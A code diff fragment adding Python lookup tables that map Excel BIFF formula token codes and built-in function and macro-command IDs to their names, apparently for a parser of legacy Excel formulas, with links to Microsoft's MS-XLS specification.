+0x1E: 'ptgInt',
+0x1F: 'ptgNum',
+0x20: 'ptgArray',
+0x21: 'ptgFunc',
+0x22: 'ptgFuncVar',
+0x23: 'ptgName',
+0x24: 'ptgRef',
+0x25: 'ptgArea',
+0x26: 'ptgMemArea',
+0x27: 'ptgMemErr',
+0x28: 'ptgMemNoMem',
+0x29: 'ptgMemFunc',
+0x2A: 'ptgRefErr',
+0x2B: 'ptgAreaErr',
+0x2C: 'ptgRefN',
+0x2D: 'ptgAreaN',
+0x2E: 'ptgMemAreaN',
+0x2F: 'ptgMemNoMemN',
+0x39: 'ptgNameX',
+0x3A: 'ptgRef3d',
+0x3B: 'ptgArea3d',
+0x3C: 'ptgRefErr3d',
+0x3D: 'ptgAreaErr3d',
+0x40: 'ptgArrayV',
+0x41: 'ptgFuncV',
+0x42: 'ptgFuncVarV',
+0x43: 'ptgNameV',
+0x44: 'ptgRefV',
+0x45: 'ptgAreaV',
+0x46: 'ptgMemAreaV',
+0x47: 'ptgMemErrV',
+0x48: 'ptgMemNoMemV',
+0x49: 'ptgMemFuncV',
+0x4A: 'ptgRefErrV',
+0x4B: 'ptgAreaErrV',
+0x4C: 'ptgRefNV',
+0x4D: 'ptgAreaNV',
+0x4E: 'ptgMemAreaNV',
+0x4F: 'ptgMemNoMemNV',
+0x58: 'ptgFuncCEV',
+0x59: 'ptgNameXV',
+0x5A: 'ptgRef3dV',
+0x5B: 'ptgArea3dV',
+0x5C: 'ptgRefErr3dV',
+0x5D: 'ptgAreaErr3dV',
+0x60: 'ptgArrayA',
+0x61: 'ptgFuncA',
+0x62: 'ptgFuncVarA',
+0x63: 'ptgNameA',
+0x64: 'ptgRefA',
+0x65: 'ptgAreaA',
+0x66: 'ptgMemAreaA',
+0x67: 'ptgMemErrA',
+0x68: 'ptgMemNoMemA',
+0x69: 'ptgMemFuncA',
+0x6A: 'ptgRefErrA',
+0x6B: 'ptgAreaErrA',
+0x6C: 'ptgRefNA',
+0x6D: 'ptgAreaNA',
+0x6E: 'ptgMemAreaNA',
+0x6F: 'ptgMemNoMemNA',
+0x78: 'ptgFuncCEA',
+0x79: 'ptgNameXA',
+0x7A: 'ptgRef3dA',
+0x7B: 'ptgArea3dA',
+0x7C: 'ptgRefErr3dA',
+0x7D: 'ptgAreaErr3dA',
+}
+
+ dFunctions = {
+#https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/00b5dd7d-51ca-4938-b7b7-483fe0e5933b
+0x0000: 'COUNT',
+0x0001: 'IF',
+0x0002: 'ISNA',
+0x0003: 'ISERROR',
+0x0004: 'SUM',
+0x0005: 'AVERAGE',
+0x0006: 'MIN',
+0x0007: 'MAX',
+0x0008: 'ROW',
+0x0009: 'COLUMN',
+0x000A: 'NA',
+0x000B: 'NPV',
+0x000C: 'STDEV',
+0x000D: 'DOLLAR',
+0x000E: 'FIXED',
+0x000F: 'SIN',
+0x0010: 'COS',
+0x0011: 'TAN',
+0x0012: 'ATAN',
+0x0013: 'PI',
+0x0014: 'SQRT',
+0x0015: 'EXP',
+0x0016: 'LN',
+0x0017: 'LOG10',
+0x0018: 'ABS',
+0x0019: 'INT',
+0x001A: 'SIGN',
+0x001B: 'ROUND',
+0x001C: 'LOOKUP',
+0x001D: 'INDEX',
+0x001E: 'REPT',
+0x001F: ['MID', 3],
+0x0020: 'LEN',
+0x0021: 'VALUE',
+0x0022: 'TRUE',
+0x0023: 'FALSE',
+0x0024: 'AND',
+0x0025: 'OR',
+0x0026: 'NOT',
+0x0027: 'MOD',
+0x0028: 'DCOUNT',
+0x0029: 'DSUM',
+0x002A: 'DAVERAGE',
+0x002B: 'DMIN',
+0x002C: 'DMAX',
+0x002D: 'DSTDEV',
+0x002E: 'VAR',
+0x002F: 'DVAR',
+0x0030: 'TEXT',
+0x0031: 'LINEST',
+0x0032: 'TREND',
+0x0033: 'LOGEST',
+0x0034: 'GROWTH',
+0x0035: 'GOTO',
+0x0036: 'HALT',
+0x0037: 'RETURN',
+0x0038: 'PV',
+0x0039: 'FV',
+0x003A: 'NPER',
+0x003B: 'PMT',
+0x003C: 'RATE',
+0x003D: 'MIRR',
+0x003E: 'IRR',
+0x003F: 'RAND',
+0x0040: 'MATCH',
+0x0041: 'DATE',
+0x0042: 'TIME',
+0x0043: 'DAY',
+0x0044: 'MONTH',
+0x0045: 'YEAR',
+0x0046: 'WEEKDAY',
+0x0047: 'HOUR',
+0x0048: 'MINUTE',
+0x0049: 'SECOND',
+0x004A: ['NOW', 0],
+0x004B: 'AREAS',
+0x004C: 'ROWS',
+0x004D: 'COLUMNS',
+0x004E: 'OFFSET',
+0x004F: 'ABSREF',
+0x0050: 'RELREF',
+0x0051: 'ARGUMENT',
+0x0052: 'SEARCH',
+0x0053: 'TRANSPOSE',
+0x0054: 'ERROR',
+0x0055: 'STEP',
+0x0056: 'TYPE',
+0x0057: 'ECHO',
+0x0058: 'SET.NAME',
+0x0059: 'CALLER',
+0x005A: 'DEREF',
+0x005B: 'WINDOWS',
+0x005C: 'SERIES',
+0x005D: 'DOCUMENTS',
+0x005E: ['ACTIVE.CELL', 0],
+0x005F: 'SELECTION',
+0x0060: 'RESULT',
+0x0061: 'ATAN2',
+0x0062: 'ASIN',
+0x0063: 'ACOS',
+0x0064: 'CHOOSE',
+0x0065: 'HLOOKUP',
+0x0066: 'VLOOKUP',
+0x0067: 'LINKS',
+0x0068: 'INPUT',
+0x0069: 'ISREF',
+0x006A: 'GET.FORMULA',
+0x006B: 'GET.NAME',
+0x006C: ['SET.VALUE', 2],
+0x006D: 'LOG',
+0x006E: 'EXEC',
+0x006F: 'CHAR',
+0x0070: 'LOWER',
+0x0071: 'UPPER',
+0x0072: 'PROPER',
+0x0073: 'LEFT',
+0x0074: 'RIGHT',
+0x0075: 'EXACT',
+0x0076: 'TRIM',
+0x0077: 'REPLACE',
+0x0078: 'SUBSTITUTE',
+0x0079: 'CODE',
+0x007A: 'NAMES',
+0x007B: 'DIRECTORY',
+0x007C: 'FIND',
+0x007D: 'CELL',
+0x007E: 'ISERR',
+0x007F: 'ISTEXT',
+0x0080: 'ISNUMBER',
+0x0081: 'ISBLANK',
+0x0082: 'T',
+0x0083: 'N',
+0x0084: 'FOPEN',
+0x0085: 'FCLOSE',
+0x0086: 'FSIZE',
+0x0087: 'FREADLN',
+0x0088: 'FREAD',
+0x0089: 'FWRITELN',
+0x008A: 'FWRITE',
+0x008B: 'FPOS',
+0x008C: 'DATEVALUE',
+0x008D: 'TIMEVALUE',
+0x008E: 'SLN',
+0x008F: 'SYD',
+0x0090: 'DDB',
+0x0091: 'GET.DEF',
+0x0092: 'REFTEXT',
+0x0093: 'TEXTREF',
+0x0094: 'INDIRECT',
+0x0095: 'REGISTER',
+0x0096: 'CALL',
+0x0097: 'ADD.BAR',
+0x0098: 'ADD.MENU',
+0x0099: 'ADD.COMMAND',
+0x009A: 'ENABLE.COMMAND',
+0x009B: 'CHECK.COMMAND',
+0x009C: 'RENAME.COMMAND',
+0x009D: 'SHOW.BAR',
+0x009E: 'DELETE.MENU',
+0x009F: 'DELETE.COMMAND',
+0x00A0: 'GET.CHART.ITEM',
+0x00A1: 'DIALOG.BOX',
+0x00A2: 'CLEAN',
+0x00A3: 'MDETERM',
+0x00A4: 'MINVERSE',
+0x00A5: 'MMULT',
+0x00A6: 'FILES',
+0x00A7: 'IPMT',
+0x00A8: 'PPMT',
+0x00A9: 'COUNTA',
+0x00AA: 'CANCEL.KEY',
+0x00AB: 'FOR',
+0x00AC: 'WHILE',
+0x00AD: 'BREAK',
+0x00AE: ['NEXT', 0],
+0x00AF: 'INITIATE',
+0x00B0: 'REQUEST',
+0x00B1: 'POKE',
+0x00B2: 'EXECUTE',
+0x00B3: 'TERMINATE',
+0x00B4: 'RESTART',
+0x00B5: 'HELP',
+0x00B6: 'GET.BAR',
+0x00B7: 'PRODUCT',
+0x00B8: 'FACT',
+0x00B9: 'GET.CELL',
+0x00BA: 'GET.WORKSPACE',
+0x00BB: 'GET.WINDOW',
+0x00BC: 'GET.DOCUMENT',
+0x00BD: 'DPRODUCT',
+0x00BE: 'ISNONTEXT',
+0x00BF: 'GET.NOTE',
+0x00C0: 'NOTE',
+0x00C1: 'STDEVP',
+0x00C2: 'VARP',
+0x00C3: 'DSTDEVP',
+0x00C4: 'DVARP',
+0x00C5: 'TRUNC',
+0x00C6: 'ISLOGICAL',
+0x00C7: 'DCOUNTA',
+0x00C8: 'DELETE.BAR',
+0x00C9: 'UNREGISTER',
+0x00CC: 'USDOLLAR',
+0x00CD: 'FINDB',
+0x00CE: 'SEARCHB',
+0x00CF: 'REPLACEB',
+0x00D0: 'LEFTB',
+0x00D1: 'RIGHTB',
+0x00D2: 'MIDB',
+0x00D3: 'LENB',
+0x00D4: 'ROUNDUP',
+0x00D5: 'ROUNDDOWN',
+0x00D6: 'ASC',
+0x00D7: 'DBCS',
+0x00D8: 'RANK',
+0x00DB: 'ADDRESS',
+0x00DC: 'DAYS360',
+0x00DD: 'TODAY',
+0x00DE: 'VDB',
+0x00DF: 'ELSE',
+0x00E0: 'ELSE.IF',
+0x00E1: 'END.IF',
+0x00E2: 'FOR.CELL',
+0x00E3: 'MEDIAN',
+0x00E4: 'SUMPRODUCT',
+0x00E5: 'SINH',
+0x00E6: 'COSH',
+0x00E7: 'TANH',
+0x00E8: 'ASINH',
+0x00E9: 'ACOSH',
+0x00EA: 'ATANH',
+0x00EB: 'DGET',
+0x00EC: 'CREATE.OBJECT',
+0x00ED: 'VOLATILE',
+0x00EE: 'LAST.ERROR',
+0x00EF: 'CUSTOM.UNDO',
+0x00F0: 'CUSTOM.REPEAT',
+0x00F1: 'FORMULA.CONVERT',
+0x00F2: 'GET.LINK.INFO',
+0x00F3: 'TEXT.BOX',
+0x00F4: 'INFO',
+0x00F5: 'GROUP',
+0x00F6: 'GET.OBJECT',
+0x00F7: 'DB',
+0x00F8: 'PAUSE',
+0x00FB: 'RESUME',
+0x00FC: 'FREQUENCY',
+0x00FD: 'ADD.TOOLBAR',
+0x00FE: 'DELETE.TOOLBAR',
+0x00FF: 'User Defined Function',
+0x0100: 'RESET.TOOLBAR',
+0x0101: 'EVALUATE',
+0x0102: 'GET.TOOLBAR',
+0x0103: 'GET.TOOL',
+0x0104: 'SPELLING.CHECK',
+0x0105: 'ERROR.TYPE',
+0x0106: 'APP.TITLE',
+0x0107: 'WINDOW.TITLE',
+0x0108: 'SAVE.TOOLBAR',
+0x0109: 'ENABLE.TOOL',
+0x010A: 'PRESS.TOOL',
+0x010B: 'REGISTER.ID',
+0x010C: 'GET.WORKBOOK',
+0x010D: 'AVEDEV',
+0x010E: 'BETADIST',
+0x010F: 'GAMMALN',
+0x0110: 'BETAINV',
+0x0111: 'BINOMDIST',
+0x0112: 'CHIDIST',
+0x0113: 'CHIINV',
+0x0114: 'COMBIN',
+0x0115: 'CONFIDENCE',
+0x0116: 'CRITBINOM',
+0x0117: 'EVEN',
+0x0118: 'EXPONDIST',
+0x0119: 'FDIST',
+0x011A: 'FINV',
+0x011B: 'FISHER',
+0x011C: 'FISHERINV',
+0x011D: 'FLOOR',
+0x011E: 'GAMMADIST',
+0x011F: 'GAMMAINV',
+0x0120: 'CEILING',
+0x0121: 'HYPGEOMDIST',
+0x0122: 'LOGNORMDIST',
+0x0123: 'LOGINV',
+0x0124: 'NEGBINOMDIST',
+0x0125: 'NORMDIST',
+0x0126: 'NORMSDIST',
+0x0127: 'NORMINV',
+0x0128: 'NORMSINV',
+0x0129: 'STANDARDIZE',
+0x012A: 'ODD',
+0x012B: 'PERMUT',
+0x012C: 'POISSON',
+0x012D: 'TDIST',
+0x012E: 'WEIBULL',
+0x012F: 'SUMXMY2',
+0x0130: 'SUMX2MY2',
+0x0131: 'SUMX2PY2',
+0x0132: 'CHITEST',
+0x0133: 'CORREL',
+0x0134: 'COVAR',
+0x0135: 'FORECAST',
+0x0136: 'FTEST',
+0x0137: 'INTERCEPT',
+0x0138: 'PEARSON',
+0x0139: 'RSQ',
+0x013A: 'STEYX',
+0x013B: 'SLOPE',
+0x013C: 'TTEST',
+0x013D: 'PROB',
+0x013E: 'DEVSQ',
+0x013F: 'GEOMEAN',
+0x0140: 'HARMEAN',
+0x0141: 'SUMSQ',
+0x0142: 'KURT',
+0x0143: 'SKEW',
+0x0144: 'ZTEST',
+0x0145: 'LARGE',
+0x0146: 'SMALL',
+0x0147: 'QUARTILE',
+0x0148: 'PERCENTILE',
+0x0149: 'PERCENTRANK',
+0x014A: 'MODE',
+0x014B: 'TRIMMEAN',
+0x014C: 'TINV',
+0x014E: 'MOVIE.COMMAND',
+0x014F: 'GET.MOVIE',
+0x0150: 'CONCATENATE',
+0x0151: 'POWER',
+0x0152: 'PIVOT.ADD.DATA',
+0x0153: 'GET.PIVOT.TABLE',
+0x0154: 'GET.PIVOT.FIELD',
+0x0155: 'GET.PIVOT.ITEM',
+0x0156: 'RADIANS',
+0x0157: 'DEGREES',
+0x0158: 'SUBTOTAL',
+0x0159: 'SUMIF',
+0x015A: 'COUNTIF',
+0x015B: 'COUNTBLANK',
+0x015C: 'SCENARIO.GET',
+0x015D: 'OPTIONS.LISTS.GET',
+0x015E: 'ISPMT',
+0x015F: 'DATEDIF',
+0x0160: 'DATESTRING',
+0x0161: 'NUMBERSTRING',
+0x0162: 'ROMAN',
+0x0163: 'OPEN.DIALOG',
+0x0164: 'SAVE.DIALOG',
+0x0165: 'VIEW.GET',
+0x0166: 'GETPIVOTDATA',
+0x0167: 'HYPERLINK',
+0x0168: 'PHONETIC',
+0x0169: 'AVERAGEA',
+0x016A: 'MAXA',
+0x016B: 'MINA',
+0x016C: 'STDEVPA',
+0x016D: 'VARPA',
+0x016E: 'STDEVA',
+0x016F: 'VARA',
+0x0170: 'BAHTTEXT',
+0x0171: 'THAIDAYOFWEEK',
+0x0172: 'THAIDIGIT',
+0x0173: 'THAIMONTHOFYEAR',
+0x0174: 'THAINUMSOUND',
+0x0175: 'THAINUMSTRING',
+0x0176: 'THAISTRINGLENGTH',
+0x0177: 'ISTHAIDIGIT',
+0x0178: 'ROUNDBAHTDOWN',
+0x0179: 'ROUNDBAHTUP',
+0x017A: 'THAIYEAR',
+0x017B: 'RTD',
+0x01E0: 'IFERROR',
+
+#https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/0b8acba5-86d2-4854-836e-0afaee743d44
+0x8000: 'BEEP',
+0x8001: 'OPEN',
+0x8002: 'OPEN.LINKS',
+0x8003: 'CLOSE.ALL',
+0x8004: 'SAVE',
+0x8005: 'SAVE.AS',
+0x8006: 'FILE.DELETE',
+0x8007: 'PAGE.SETUP',
+0x8008: 'PRINT',
+0x8009: 'PRINTER.SETUP',
+0x800A: 'QUIT',
+0x800B: 'NEW.WINDOW',
+0x800C: 'ARRANGE.ALL',
+0x800D: 'WINDOW.SIZE',
+0x800E: 'WINDOW.MOVE',
+0x800F: 'FULL',
+0x8010: 'CLOSE',
+0x8011: 'RUN',
+0x8016: 'SET.PRINT.AREA',
+0x8017: 'SET.PRINT.TITLES',
+0x8018: 'SET.PAGE.BREAK',
+0x8019: 'REMOVE.PAGE.BREAK',
+0x801A: 'FONT',
+0x801B: 'DISPLAY',
+0x801C: 'PROTECT.DOCUMENT',
+0x801D: 'PRECISION',
+0x801E: 'A1.R1C1',
+0x801F: 'CALCULATE.NOW',
+0x8020: 'CALCULATION',
+0x8022: 'DATA.FIND',
+0x8023: 'EXTRACT',
+0x8024: 'DATA.DELETE',
+0x8025: 'SET.DATABASE',
+0x8026: 'SET.CRITERIA',
+0x8027: 'SORT',
+0x8028: 'DATA.SERIES',
+0x8029: 'TABLE',
+0x802A: 'FORMAT.NUMBER',
+0x802B: 'ALIGNMENT',
+0x802C: 'STYLE',
+0x802D: 'BORDER',
+0x802E: 'CELL.PROTECTION',
+0x802F: 'COLUMN.WIDTH',
+0x8030: 'UNDO',
+0x8031: 'CUT',
+0x8032: 'COPY',
+0x8033: 'PASTE',
+0x8034: 'CLEAR',
+0x8035: 'PASTE.SPECIAL',
+0x8036: 'EDIT.DELETE',
+0x8037: 'INSERT',
+0x8038: 'FILL.RIGHT',
+0x8039: 'FILL.DOWN',
+0x803D: 'DEFINE.NAME',
+0x803E: 'CREATE.NAMES',
+0x803F: 'FORMULA.GOTO',
+0x8040: 'FORMULA.FIND',
+0x8041: 'SELECT.LAST.CELL',
+0x8042: 'SHOW.ACTIVE.CELL',
+0x8043: 'GALLERY.AREA',
+0x8044: 'GALLERY.BAR',
+0x8045: 'GALLERY.COLUMN',
+0x8046: 'GALLERY.LINE',
+0x8047: 'GALLERY.PIE',
+0x8048: 'GALLERY.SCATTER',
+0x8049: 'COMBINATION',
+0x804A: 'PREFERRED',
+0x804B: 'ADD.OVERLAY',
+0x804C: 'GRIDLINES',
+0x804D: 'SET.PREFERRED',
+0x804E: 'AXES',
+0x804F: 'LEGEND',
+0x8050: 'ATTACH.TEXT',
+0x8051: 'ADD.ARROW',
+0x8052: 'SELECT.CHART',
+0x8053: 'SELECT.PLOT.AREA',
+0x8054: 'PATTERNS',
+0x8055: 'MAIN.CHART',
+0x8056: 'OVERLAY',
+0x8057: 'SCALE',
+0x8058: 'FORMAT.LEGEND',
+0x8059: 'FORMAT.TEXT',
+0x805A: 'EDIT.REPEAT',
+0x805B: 'PARSE',
+0x805C: 'JUSTIFY',
+0x805D: 'HIDE',
+0x805E: 'UNHIDE',
+0x805F: 'WORKSPACE',
+0x8060: 'FORMULA',
+0x8061: 'FORMULA.FILL',
+0x8062: 'FORMULA.ARRAY',
+0x8063: 'DATA.FIND.NEXT',
+0x8064: 'DATA.FIND.PREV',
+0x8065: 'FORMULA.FIND.NEXT',
+0x8066: 'FORMULA.FIND.PREV',
+0x8067: 'ACTIVATE',
+0x8068: 'ACTIVATE.NEXT',
+0x8069: 'ACTIVATE.PREV',
+0x806A: 'UNLOCKED.NEXT',
+0x806B: 'UNLOCKED.PREV',
+0x806C: 'COPY.PICTURE',
+0x806D: 'SELECT',
+0x806E: 'DELETE.NAME',
+0x806F: 'DELETE.FORMAT',
+0x8070: 'VLINE',
+0x8071: 'HLINE',
+0x8072: 'VPAGE',
+0x8073: 'HPAGE',
+0x8074: 'VSCROLL',
+0x8075: 'HSCROLL',
+0x8076: 'ALERT',
+0x8077: 'NEW',
+0x8078: 'CANCEL.COPY',
+0x8079: 'SHOW.CLIPBOARD',
+0x807A: 'MESSAGE',
+0x807C: 'PASTE.LINK',
+0x807D: 'APP.ACTIVATE',
+0x807E: 'DELETE.ARROW',
+0x807F: 'ROW.HEIGHT',
+0x8080: 'FORMAT.MOVE',
+0x8081: 'FORMAT.SIZE',
+0x8082: 'FORMULA.REPLACE',
+0x8083: 'SEND.KEYS',
+0x8084: 'SELECT.SPECIAL',
+0x8085: 'APPLY.NAMES',
+0x8086: 'REPLACE.FONT',
+0x8087: 'FREEZE.PANES',
+0x8088: 'SHOW.INFO',
+0x8089: 'SPLIT',
+0x808A: 'ON.WINDOW',
+0x808B: 'ON.DATA',
+0x808C: 'DISABLE.INPUT',
+0x808E: 'OUTLINE',
+0x808F: 'LIST.NAMES',
+0x8090: 'FILE.CLOSE',
+0x8091: 'SAVE.WORKBOOK',
+0x8092: 'DATA.FORM',
+0x8093: 'COPY.CHART',
+0x8094: 'ON.TIME',
+0x8095: 'WAIT',
+0x8096: 'FORMAT.FONT',
+0x8097: 'FILL.UP',
+0x8098: 'FILL.LEFT',
+0x8099: 'DELETE.OVERLAY',
+0x809B: 'SHORT.MENUS',
+0x809F: 'SET.UPDATE.STATUS',
+0x80A1: 'COLOR.PALETTE',
+0x80A2: 'DELETE.STYLE',
+0x80A3: 'WINDOW.RESTORE',
+0x80A4: 'WINDOW.MAXIMIZE',
+0x80A6: 'CHANGE.LINK',
+0x80A7: 'CALCULATE.DOCUMENT',
+0x80A8: 'ON.KEY',
+0x80A9: 'APP.RESTORE',
+0x80AA: 'APP.MOVE',
+0x80AB: 'APP.SIZE',
+0x80AC: 'APP.MINIMIZE',
+0x80AD: 'APP.MAXIMIZE',
+0x80AE: 'BRING.TO.FRONT',
+0x80AF: 'SEND.TO.BACK',
+0x80B9: 'MAIN.CHART.TYPE',
+0x80BA: 'OVERLAY.CHART.TYPE',
+0x80BB: 'SELECT.END',
+0x80BC: 'OPEN.MAIL',
+0x80BD: 'SEND.MAIL',
+0x80BE: 'STANDARD.FONT',
+0x80BF: 'CONSOLIDATE',
+0x80C0: 'SORT.SPECIAL',
+0x80C1: 'GALLERY.3D.AREA',
+0x80C2: 'GALLERY.3D.COLUMN',
+0x80C3: 'GALLERY.3D.LINE',
+0x80C4: 'GALLERY.3D.PIE',
+0x80C5: 'VIEW.3D',
+0x80C6: 'GOAL.SEEK',
+0x80C7: 'WORKGROUP',
+0x80C8: 'FILL.GROUP',
+0x80C9: 'UPDATE.LINK',
+0x80CA: 'PROMOTE',
+0x80CB: 'DEMOTE',
+0x80CC: 'SHOW.DETAIL',
+0x80CE: 'UNGROUP',
+0x80CF: 'OBJECT.PROPERTIES',
+0x80D0: 'SAVE.NEW.OBJECT',
+0x80D1: 'SHARE',
+0x80D2: 'SHARE.NAME',
+0x80D3: 'DUPLICATE',
+0x80D4: 'APPLY.STYLE',
+0x80D5: 'ASSIGN.TO.OBJECT',
+0x80D6: 'OBJECT.PROTECTION',
+0x80D7: 'HIDE.OBJECT',
+0x80D8: 'SET.EXTRACT',
+0x80D9: 'CREATE.PUBLISHER',
+0x80DA: 'SUBSCRIBE.TO',
+0x80DB: 'ATTRIBUTES',
+0x80DC: 'SHOW.TOOLBAR',
+0x80DE: 'PRINT.PREVIEW',
+0x80DF: 'EDIT.COLOR',
+0x80E0: 'SHOW.LEVELS',
+0x80E1: 'FORMAT.MAIN',
+0x80E2: 'FORMAT.OVERLAY',
+0x80E3: 'ON.RECALC',
+0x80E4: 'EDIT.SERIES',
+0x80E5: 'DEFINE.STYLE',
+0x80F0: 'LINE.PRINT',
+0x80F3: 'ENTER.DATA',
+0x80F9: 'GALLERY.RADAR',
+0x80FA: 'MERGE.STYLES',
+0x80FB: 'EDITION.OPTIONS',
+0x80FC: 'PASTE.PICTURE',
+0x80FD: 'PASTE.PICTURE.LINK',
+0x80FE: 'SPELLING',
+0x8100: 'ZOOM',
+0x8103: 'INSERT.OBJECT',
+0x8104: 'WINDOW.MINIMIZE',
+0x8109: 'SOUND.NOTE',
+0x810A: 'SOUND.PLAY',
+0x810B: 'FORMAT.SHAPE',
+0x810C: 'EXTEND.POLYGON',
+0x810D: 'FORMAT.AUTO',
+0x8110: 'GALLERY.3D.BAR',
+0x8111: 'GALLERY.3D.SURFACE',
+0x8112: 'FILL.AUTO',
+0x8114: 'CUSTOMIZE.TOOLBAR',
+0x8115: 'ADD.TOOL',
+0x8116: 'EDIT.OBJECT',
+0x8117: 'ON.DOUBLECLICK',
+0x8118: 'ON.ENTRY',
+0x8119: 'WORKBOOK.ADD',
+0x811A: 'WORKBOOK.MOVE',
+0x811B: 'WORKBOOK.COPY',
+0x811C: 'WORKBOOK.OPTIONS',
+0x811D: 'SAVE.WORKSPACE',
+0x8120: 'CHART.WIZARD',
+0x8121: 'DELETE.TOOL',
+0x8122: 'MOVE.TOOL',
+0x8123: 'WORKBOOK.SELECT',
+0x8124: 'WORKBOOK.ACTIVATE',
+0x8125: 'ASSIGN.TO.TOOL',
+0x8127: 'COPY.TOOL',
+0x8128: 'RESET.TOOL',
+0x8129: 'CONSTRAIN.NUMERIC',
+0x812A: 'PASTE.TOOL',
+0x812E: 'WORKBOOK.NEW',
+0x8131: 'SCENARIO.CELLS',
+0x8132: 'SCENARIO.DELETE',
+0x8133: 'SCENARIO.ADD',
+0x8134: 'SCENARIO.EDIT',
+0x8135: 'SCENARIO.SHOW',
+0x8136: 'SCENARIO.SHOW.NEXT',
+0x8137: 'SCENARIO.SUMMARY',
+0x8138: 'PIVOT.TABLE.WIZARD',
+0x8139: 'PIVOT.FIELD.PROPERTIES',
+0x813A: 'PIVOT.FIELD',
+0x813B: 'PIVOT.ITEM',
+0x813C: 'PIVOT.ADD.FIELDS',
+0x813E: 'OPTIONS.CALCULATION',
+0x813F: 'OPTIONS.EDIT',
+0x8140: 'OPTIONS.VIEW',
+0x8141: 'ADDIN.MANAGER',
+0x8142: 'MENU.EDITOR',
+0x8143: 'ATTACH.TOOLBARS',
+0x8144: 'VBAActivate',
+0x8145: 'OPTIONS.CHART',
+0x8148: 'VBA.INSERT.FILE',
+0x814A: 'VBA.PROCEDURE.DEFINITION',
+0x8150: 'ROUTING.SLIP',
+0x8152: 'ROUTE.DOCUMENT',
+0x8153: 'MAIL.LOGON',
+0x8156: 'INSERT.PICTURE',
+0x8157: 'EDIT.TOOL',
+0x8158: 'GALLERY.DOUGHNUT',
+0x815E: 'CHART.TREND',
+0x8160: 'PIVOT.ITEM.PROPERTIES',
+0x8162: 'WORKBOOK.INSERT',
+0x8163: 'OPTIONS.TRANSITION',
+0x8164: 'OPTIONS.GENERAL',
+0x8172: 'FILTER.ADVANCED',
+0x8175: 'MAIL.ADD.MAILER',
+0x8176: 'MAIL.DELETE.MAILER',
+0x8177: 'MAIL.REPLY',
+0x8178: 'MAIL.REPLY.ALL',
+0x8179: 'MAIL.FORWARD',
+0x817A: 'MAIL.NEXT.LETTER',
+0x817B: 'DATA.LABEL',
+0x817C: 'INSERT.TITLE',
+0x817D: 'FONT.PROPERTIES',
+0x817E: 'MACRO.OPTIONS',
+0x817F: 'WORKBOOK.HIDE',
+0x8180: 'WORKBOOK.UNHIDE',
+0x8181: 'WORKBOOK.DELETE',
+0x8182: 'WORKBOOK.NAME',
+0x8184: 'GALLERY.CUSTOM',
+0x8186: 'ADD.CHART.AUTOFORMAT',
+0x8187: 'DELETE.CHART.AUTOFORMAT',
+0x8188: 'CHART.ADD.DATA',
+0x8189: 'AUTO.OUTLINE',
+0x818A: 'TAB.ORDER',
+0x818B: 'SHOW.DIALOG',
+0x818C: 'SELECT.ALL',
+0x818D: 'UNGROUP.SHEETS',
+0x818E: 'SUBTOTAL.CREATE',
+0x818F: 'SUBTOTAL.REMOVE',
+0x8190: 'RENAME.OBJECT',
+0x819C: 'WORKBOOK.SCROLL',
+0x819D: 'WORKBOOK.NEXT',
+0x819E: 'WORKBOOK.PREV',
+0x819F: 'WORKBOOK.TAB.SPLIT',
+0x81A0: 'FULL.SCREEN',
+0x81A1: 'WORKBOOK.PROTECT',
+0x81A4: 'SCROLLBAR.PROPERTIES',
+0x81A5: 'PIVOT.SHOW.PAGES',
+0x81A6: 'TEXT.TO.COLUMNS',
+0x81A7: 'FORMAT.CHARTTYPE',
+0x81A8: 'LINK.FORMAT',
+0x81A9: 'TRACER.DISPLAY',
+0x81AE: 'TRACER.NAVIGATE',
+0x81AF: 'TRACER.CLEAR',
+0x81B0: 'TRACER.ERROR',
+0x81B1: 'PIVOT.FIELD.GROUP',
+0x81B2: 'PIVOT.FIELD.UNGROUP',
+0x81B3: 'CHECKBOX.PROPERTIES',
+0x81B4: 'LABEL.PROPERTIES',
+0x81B5: 'LISTBOX.PROPERTIES',
+0x81B6: 'EDITBOX.PROPERTIES',
+0x81B7: 'PIVOT.REFRESH',
+0x81B8: 'LINK.COMBO',
+0x81B9: 'OPEN.TEXT',
+0x81BA: 'HIDE.DIALOG',
+0x81BB: 'SET.DIALOG.FOCUS',
+0x81BC: 'ENABLE.OBJECT',
+0x81BD: 'PUSHBUTTON.PROPERTIES',
+0x81BE: 'SET.DIALOG.DEFAULT',
+0x81BF: 'FILTER',
+0x81C0: 'FILTER.SHOW.ALL',
+0x81C1: 'CLEAR.OUTLINE',
+0x81C2: 'FUNCTION.WIZARD',
+0x81C3: 'ADD.LIST.ITEM',
+0x81C4: 'SET.LIST.ITEM',
+0x81C5: 'REMOVE.LIST.ITEM',
+0x81C6: 'SELECT.LIST.ITEM',
+0x81C7: 'SET.CONTROL.VALUE',
+0x81C8: 'SAVE.COPY.AS',
+0x81CA: 'OPTIONS.LISTS.ADD',
+0x81CB: 'OPTIONS.LISTS.DELETE',
+0x81CC: 'SERIES.AXES',
+0x81CD: 'SERIES.X',
+0x81CE: 'SERIES.Y',
+0x81CF: 'ERRORBAR.X',
+0x81D0: 'ERRORBAR.Y',
+0x81D1: 'FORMAT.CHART',
+0x81D2: 'SERIES.ORDER',
+0x81D3: 'MAIL.LOGOFF',
+0x81D4: 'CLEAR.ROUTING.SLIP',
+0x81D5: 'APP.ACTIVATE.MICROSOFT',
+0x81D6: 'MAIL.EDIT.MAILER',
+0x81D7: 'ON.SHEET',
+0x81D8: 'STANDARD.WIDTH',
+0x81D9: 'SCENARIO.MERGE',
+0x81DA: 'SUMMARY.INFO',
+0x81DB: 'FIND.FILE',
+0x81DC: 'ACTIVE.CELL.FONT',
+0x81DD: 'ENABLE.TIPWIZARD',
+0x81DE: 'VBA.MAKE.ADDIN',
+0x81E0: 'INSERTDATATABLE',
+0x81E1: 'WORKGROUP.OPTIONS',
+0x81E2: 'MAIL.SEND.MAILER',
+0x81E5: 'AUTOCORRECT',
+0x81E9: 'POST.DOCUMENT',
+0x81EB: 'PICKLIST',
+0x81ED: 'VIEW.SHOW',
+0x81EE: 'VIEW.DEFINE',
+0x81EF: 'VIEW.DELETE',
+0x81FD: 'SHEET.BACKGROUND',
+0x81FE: 'INSERT.MAP.OBJECT',
+0x81FF: 'OPTIONS.MENONO',
+0x8205: 'MSOCHECKS',
+0x8206: 'NORMAL',
+0x8207: 'LAYOUT',
+0x8208: 'RM.PRINT.AREA',
+0x8209: 'CLEAR.PRINT.AREA',
+0x820A: 'ADD.PRINT.AREA',
+0x820B: 'MOVE.BRK',
+0x8221: 'HIDECURR.NOTE',
